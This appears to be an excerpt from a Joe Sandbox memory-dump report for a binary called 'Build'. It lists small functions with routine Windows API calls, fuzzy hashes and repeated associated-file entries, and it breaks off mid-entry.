Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c2872be8987a01e7c264dcdae9eb89633ea7cf5d18781723caec466b153c6274
Instruction ID: ceb705e7d15c5400929d2b2fb2c5d9293c463091c61fffc108994a251d9c92ae
Opcode Fuzzy Hash: c2872be8987a01e7c264dcdae9eb89633ea7cf5d18781723caec466b153c6274
Instruction Fuzzy Hash: C4E0ED3124422257D720276EECD0F5B3A5C8F913A2F150221AC85A72A2CF64CC0182E4

Function 0092AFD0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,0092AF75,1C667296,00000000,0095517A,000000FF,?,00928882,?,?), ref: 0092AFEB

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 18b46b01dad85e02c92ce2df302e1a63e0cd490e72d2ebe3e10196a6ec14c946
Instruction ID: a2f4c92b4894b30c3b5b239b828a5bda295231ee86b439580bd9e942a562887d
Opcode Fuzzy Hash: 18b46b01dad85e02c92ce2df302e1a63e0cd490e72d2ebe3e10196a6ec14c946
Instruction Fuzzy Hash: 60F0BE71496B229FDB308A21E958792B3E8AB12325F041B1EC0E7838E8D374A98D9641

Function 0092C37A Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0092C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000), ref: 0092C4E6
Part of subcall function 0092C4A8: FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?), ref: 0092C516
Part of subcall function 0092C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A), ref: 0092C522

FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0092C3A5

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 4d0eb5d77d39e98256f59533ccf7659a0362741493335d0d2e2deaa3bd0507b9
Instruction ID: a3cfd047cd6d63327f25d3719668457253e7e1402a4ad49970e7c849e7ab927b
Opcode Fuzzy Hash: 4d0eb5d77d39e98256f59533ccf7659a0362741493335d0d2e2deaa3bd0507b9
Instruction Fuzzy Hash: B7F082750497A0AACA227BB468057CB7BD45F66332F00CE49F1FE121EAC7B560949B72

Function 00931421 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00931445

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
Instruction ID: 107d0a79d8233b1abecb22cc337401ac4235fbf9e20124bed5da54da0246259d
Opcode Fuzzy Hash: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
Instruction Fuzzy Hash: 3EE04F321001416AD321AB19D804EBBABA99FC1720F14881EF594861A1CBB5E881CF61

Function 00932EE4 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00932F19

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 46e3111a2a73756d66bb5e24697fe802f8846613736794af2eea8d8cb9aca6eb
Instruction ID: 51e6541b9f3994251da98811cf544eff26c314ad8a0a1493869fb863084c2a24
Opcode Fuzzy Hash: 46e3111a2a73756d66bb5e24697fe802f8846613736794af2eea8d8cb9aca6eb
Instruction Fuzzy Hash: 8BD05B2165C22155DB26377578067FD555A5FC2312F094066B48D771C3CB5A4C4296E2

Function 0093C5B6 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0093C5BC

Part of subcall function 0093C34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0093C36E

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction ID: 08fd73a10bff1973a8e2128898dbe9f3b216bb940aea6e5fcb3e0f58c1551b3d
Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction Fuzzy Hash: B1D0A770214608B6DF012B20CC02E7E7698DB40340F0084217801E5140EEB1DA506F51

Function 0094017F Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 009401A4

Part of subcall function 0093D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0093D875
Part of subcall function 0093D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D886
Part of subcall function 0093D864: IsDialogMessageW.USER32(00010458,?), ref: 0093D89A
Part of subcall function 0093D864: TranslateMessage.USER32(?), ref: 0093D8A8
Part of subcall function 0093D864: DispatchMessageW.USER32(?), ref: 0093D8B2

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 066fe6941f34da81b86a64d47cad508e69e5b8cd5dbf54299627492552591baa
Instruction ID: 95010ac5bdc50be784c65889965dbf7ff9566abcf4d1c1ecad2758398e15bf68
Opcode Fuzzy Hash: 066fe6941f34da81b86a64d47cad508e69e5b8cd5dbf54299627492552591baa
Instruction Fuzzy Hash: DFD09E71158300AAD6012B51DD06F1A7AA2BB98B05F004554B384340F186629D21BF16

Function 00940A98 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00940AC0

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 57c85f33d4c5e5342ecb03db43b7720331788f245c32dde5c47cac279d7d395d
Instruction ID: 27f974821afb64bd642022f58aa02dee9fcc56b4a0c4a57b43189db24d4effd9
Opcode Fuzzy Hash: 57c85f33d4c5e5342ecb03db43b7720331788f245c32dde5c47cac279d7d395d
Instruction Fuzzy Hash: F1D0C93051971499C611BB649C9EF643298B3D870DB960800BB45962D5C7B86498E709

Function 009311EB Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 009311F5

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d8f11dd8c7b26c1bcaedb305552e69af5bdae4535988c5669ae60fd8d4bb6d6e
Instruction ID: af83c56a3c18633365401d9b30d11a1abd4a3e324a38198ee45546fb39aec0da
Opcode Fuzzy Hash: d8f11dd8c7b26c1bcaedb305552e69af5bdae4535988c5669ae60fd8d4bb6d6e
Instruction Fuzzy Hash: 34D0C970418211CFD3608F39E404782BBE4EF08311B11882E90C9C2160E6705880CF40

Function 0092B288 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,0092B18A,?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B294

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 2df22485ecf612bd99d09dc143f1ae99ae22ec2521ecf49c62c15313b758dd3c
Instruction ID: 9336fff235d5793e73b553907ec06f15f4249b8584039897e373f5489ce81dd1
Opcode Fuzzy Hash: 2df22485ecf612bd99d09dc143f1ae99ae22ec2521ecf49c62c15313b758dd3c
Instruction Fuzzy Hash: BBC01234000324D68E304A39A84909C73A6AE623B77B88298C0388A0AAC3238C83FA10

Function 00940697 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 12d3950578033b5c6e348ce6975c06006f8c08792174ae8a2be50daf2ba3eaa6
Instruction ID: 13926485dd7e66ec38816bc09ea48fbcf136825c6a34f2d69d711f5e88c6c9ab
Opcode Fuzzy Hash: 12d3950578033b5c6e348ce6975c06006f8c08792174ae8a2be50daf2ba3eaa6
Instruction Fuzzy Hash: 8BB0128635D202BC3114B1D99E17D3F015CC0C0B293318F3AF90AC1180E4645C090332

Function 009406B5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b1440fe518bc59a6d94858ec1c54a724be9ba8693057b2acbf58a70dd241059c
Instruction ID: fe93afcc109037b67acc703fb12bb50d27ed7bcc82e3b807ad0c1801322a66ad
Opcode Fuzzy Hash: b1440fe518bc59a6d94858ec1c54a724be9ba8693057b2acbf58a70dd241059c
Instruction Fuzzy Hash: 97B0128A35D302AC3654B1995D57D3F014CC0C0B293318E3AF509C1280F4645C484332

Function 009406A1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 67455476753b6483865f84384234220dff0153df9c1b0f8a53cbcb660555a17a
Instruction ID: ccfe6586520f2a8c668aab16e435b235255d54c82dab60446b6b18fc1a22b517
Opcode Fuzzy Hash: 67455476753b6483865f84384234220dff0153df9c1b0f8a53cbcb660555a17a
Instruction Fuzzy Hash: 0FB0128636D302BC3114B1999D17D3F015CD0C0F293318E3BF50AC1180E4645C080332

Function 009406AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bb386a209e56f3edaa13fe7123d8c94e18efddc5768ae6efb708af60e9f1e96a
Instruction ID: ed4f8667bff1e57d3c9f816b5b800d420be28af182d45bf838df8c17b3717ea6
Opcode Fuzzy Hash: bb386a209e56f3edaa13fe7123d8c94e18efddc5768ae6efb708af60e9f1e96a
Instruction Fuzzy Hash: 03B0128A35D302AC3114B1995D17D3F014CC0C0B29331CD3AF909C1280E4646C080332

Function 009406D3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 85a438f138b364b3088894a340423b38b0db90e4d570f9ae74ab01440037cfea
Instruction ID: 05817f64f1f0cbff503ab33bd4c9cf66bc19d8f8e9e72f393a1e1c90a75944ff
Opcode Fuzzy Hash: 85a438f138b364b3088894a340423b38b0db90e4d570f9ae74ab01440037cfea
Instruction Fuzzy Hash: 53B0128635D203AC3118B5995D17D3F014CC0C0B29331CD3AF909C1280E4645C0C0332

Function 009406DD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fe46f06c7afc144a7f3437f2841be7bce5d0b418af6a37d58499bdb9a8f0dfa8
Instruction ID: 67f8b3f8d2a106db5885d141bc7c92131ba3865339cf3e55a9519b1135a943d8
Opcode Fuzzy Hash: fe46f06c7afc144a7f3437f2841be7bce5d0b418af6a37d58499bdb9a8f0dfa8
Instruction Fuzzy Hash: ADB0128635D342AC3258B1995D17D3F014CC0C0B29331CE3AF509C1280E4645C4C0332

Function 009406C9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 315015a7864037918ad8fc517bdefa59d8fcab62e7034f4a5eca87cdefbb2900
Instruction ID: 5ddd70d2ed6a078c789d3b3db5ddf92f3f8a97cd8afe6a82be8a10bca03ceb8d
